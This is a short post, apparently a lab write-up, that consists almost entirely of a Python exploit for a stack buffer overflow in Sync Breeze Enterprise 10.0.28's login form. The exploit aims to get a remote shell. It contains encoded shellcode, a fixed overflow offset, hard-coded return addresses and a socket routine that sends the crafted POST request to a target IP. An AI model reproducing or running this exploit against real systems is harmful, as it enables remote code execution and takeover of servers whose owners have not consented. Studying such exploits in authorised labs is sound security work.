Buffer overflow

A simple stack buffer overflow against a web server

This post is about writing a buffer-overflow exploit to get a remote shell. We will exploit Sync Breeze Enterprise 10.0.28 on a Windows box. The offset, return address and shellcode in the script below were derived for that specific lab target and have to be re-derived (cyclic pattern, bad-character check, JMP ESP search, fresh msfvenom payload) before they can be reused anywhere else. PS: this post has not been updated; if I find time I will write an explanation of the code. Thank you <3

import socket
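# Encoded shellcode stage.  NOTE(review): the original script called this
# "badchars", but it is not a bad-character list -- it is the payload that
# lands after the NOP sled and executes once EIP is redirected onto the
# stack.  The "\xd9\x74\x24\xf4" (fnstenv [esp-0xc]) GetPC stub near the
# start is characteristic of an msfvenom shikata_ga_nai-encoded payload;
# confirm against the msfvenom command that produced it.  Regenerate it for
# a different listener, and because it travels inside a form field the bytes
# must avoid anything the server's form parser would terminate or decode on
# (presumably \x00, \x0a, \x0d, and the URL-form delimiters -- verify).
SHELLCODE = (
    b"\xba\xa7\x57\x4f\xe1\xda\xda\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
    b"\x52\x31\x56\x12\x83\xc6\x04\x03\xf1\x59\xad\x14\x01\x8d\xb3"
    b"\xd7\xf9\x4e\xd4\x5e\x1c\x7f\xd4\x05\x55\xd0\xe4\x4e\x3b\xdd"
    b"\x8f\x03\xaf\x56\xfd\x8b\xc0\xdf\x48\xea\xef\xe0\xe1\xce\x6e"
    b"\x63\xf8\x02\x50\x5a\x33\x57\x91\x9b\x2e\x9a\xc3\x74\x24\x09"
    b"\xf3\xf1\x70\x92\x78\x49\x94\x92\x9d\x1a\x97\xb3\x30\x10\xce"
    b"\x13\xb3\xf5\x7a\x1a\xab\x1a\x46\xd4\x40\xe8\x3c\xe7\x80\x20"
    b"\xbc\x44\xed\x8c\x4f\x94\x2a\x2a\xb0\xe3\x42\x48\x4d\xf4\x91"
    b"\x32\x89\x71\x01\x94\x5a\x21\xed\x24\x8e\xb4\x66\x2a\x7b\xb2"
    b"\x20\x2f\x7a\x17\x5b\x4b\xf7\x96\x8b\xdd\x43\xbd\x0f\x85\x10"
    b"\xdc\x16\x63\xf6\xe1\x48\xcc\xa7\x47\x03\xe1\xbc\xf5\x4e\x6e"
    b"\x70\x34\x70\x6e\x1e\x4f\x03\x5c\x81\xfb\x8b\xec\x4a\x22\x4c"
    b"\x12\x61\x92\xc2\xed\x8a\xe3\xcb\x29\xde\xb3\x63\x9b\x5f\x58"
    b"\x73\x24\x8a\xcf\x23\x8a\x65\xb0\x93\x6a\xd6\x58\xf9\x64\x09"
    b"\x78\x02\xaf\x22\x13\xf9\x38\x8d\x4c\x1c\x84\x65\x8f\x1e\xe7"
    b"\x2e\x06\xf8\x6d\xc1\x4e\x53\x1a\x78\xcb\x2f\xbb\x85\xc1\x4a"
    b"\xfb\x0e\xe6\xab\xb2\xe6\x83\xbf\x23\x07\xde\x9d\xe2\x18\xf4"
    b"\x89\x69\x8a\x93\x49\xe7\xb7\x0b\x1e\xa0\x06\x42\xca\x5c\x30"
    b"\xfc\xe8\x9c\xa4\xc7\xa8\x7a\x15\xc9\x31\x0e\x21\xed\x21\xd6"
    b"\xaa\xa9\x15\x86\xfc\x67\xc3\x60\x57\xc6\xbd\x3a\x04\x80\x29"
    b"\xba\x66\x13\x2f\xc3\xa2\xe5\xcf\x72\x1b\xb0\xf0\xbb\xcb\x34"
    b"\x89\xa1\x6b\xba\x40\x62\x9b\xf1\xc8\xc3\x34\x5c\x99\x51\x59"
    b"\x5f\x74\x95\x64\xdc\x7c\x66\x93\xfc\xf5\x63\xdf\xba\xe6\x19"
    b"\x70\x2f\x08\x8d\x71\x7a"
)

# Bytes from the start of the username field to the saved return address,
# as found with a cyclic pattern (the original notes "eip 42306142",
# "offset 780").
OFFSET = 780

# Value written over the saved return address: 0x77F1E871, little-endian.
# NOTE(review): an address in the 0x77xxxxxx range normally belongs to an
# OS DLL, which moves between Windows builds and is ASLR-randomised on
# modern systems -- re-verify that it is still a JMP ESP (or equivalent) on
# the target before relying on it.
RET_ADDR = b"\x71\xE8\xF1\x77"

# Alternative return address 0x10090c83, little-endian (the original's
# "#10090c83" note).  The original defined it as eip2 but never used it; a
# 0x10xxxxxx base is typical of an application DLL loaded at its preferred
# base, so it is kept here as the candidate to swap in if RET_ADDR fails.
RET_ADDR_ALT = b"\x83\x0c\x09\x10"

# Size of the NOP sled placed between the return address padding and the
# shellcode.  NOTE(review): 10 bytes is a thin sled for a self-modifying
# decoder stub; if the payload crashes early, a longer sled (16+) is the
# usual first thing to try.
NOP_SLED_LEN = 10

# Where the vulnerable service listens and what the request claims as Host.
# NOTE(review): the original connects to .130 but sends Host/Referer for
# .129; both values are kept verbatim -- check whether the mismatch is
# deliberate, otherwise point both at the target.
TARGET_HOST = "192.168.29.130"
TARGET_PORT = 80
HOST_HEADER = "192.168.29.129"


def build_buffer(offset=OFFSET, ret_addr=RET_ADDR, nop_count=NOP_SLED_LEN,
                 shellcode=SHELLCODE):
    """Return the raw overflow buffer placed in the ``username`` field.

    Layout: ``offset`` filler bytes, the 4-byte return address, four ``C``
    pad bytes (0x43 = INC EBX, harmless if executed), the NOP sled, then
    the shellcode.

    Args:
        offset: filler length up to the saved return address.
        ret_addr: 4 little-endian bytes that overwrite the return address.
        nop_count: length of the NOP sled.
        shellcode: payload bytes appended after the sled.
    """
    return (b"A" * offset
            + ret_addr
            + b"CCCC"
            + b"\x90" * nop_count
            + shellcode)


def build_form_body(overflow, password=b"A"):
    """Return the URL-form-encoded body carrying *overflow* as ``username``.

    The overflow bytes are inserted verbatim (not percent-encoded); the
    exploit relies on the server accepting them as-is.
    """
    return b"username=" + overflow + b"&password=" + password


def build_request(body, host=HOST_HEADER, path="/login"):
    """Return the raw HTTP/1.1 POST (headers + body) as bytes.

    ``Content-Length`` is computed from the real body length so the server
    reads the whole overflow buffer; the remaining headers mimic a browser.

    Args:
        body: already-encoded request body.
        host: value for the ``Host`` header and the ``Referer`` origin.
        path: request path.
    """
    headers = [
        "POST %s HTTP/1.1" % path,
        "Host: %s" % host,
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) "
        "Gecko/20100101 Firefox/60.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Referer: http://%s%s" % (host, path),
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: %d" % len(body),
    ]
    return "\r\n".join(headers).encode("ascii") + b"\r\n\r\n" + body


def send_exploit(target=TARGET_HOST, port=TARGET_PORT, host=HOST_HEADER,
                 timeout=10.0):
    """Build the request and deliver it to ``target:port``.

    Prints the overflow buffer length and the full request afterwards,
    as the original script did.

    Args:
        target: IP/hostname to connect to.
        port: TCP port of the vulnerable service.
        host: value sent in the ``Host``/``Referer`` headers.
        timeout: socket timeout in seconds, so a dead target fails instead
            of blocking forever.

    Raises:
        socket.error: on connect/send failure (the socket is closed first).
    """
    overflow = build_buffer()
    req = build_request(build_form_body(overflow), host=host)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((target, port))
        # sendall() keeps writing until the whole request is on the wire;
        # the original used send(), which may deliver only a prefix and
        # silently truncate the exploit buffer.
        sock.sendall(req)
    finally:
        sock.close()

    print(len(overflow))
    print(req)


if __name__ == "__main__":
    send_exploit()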
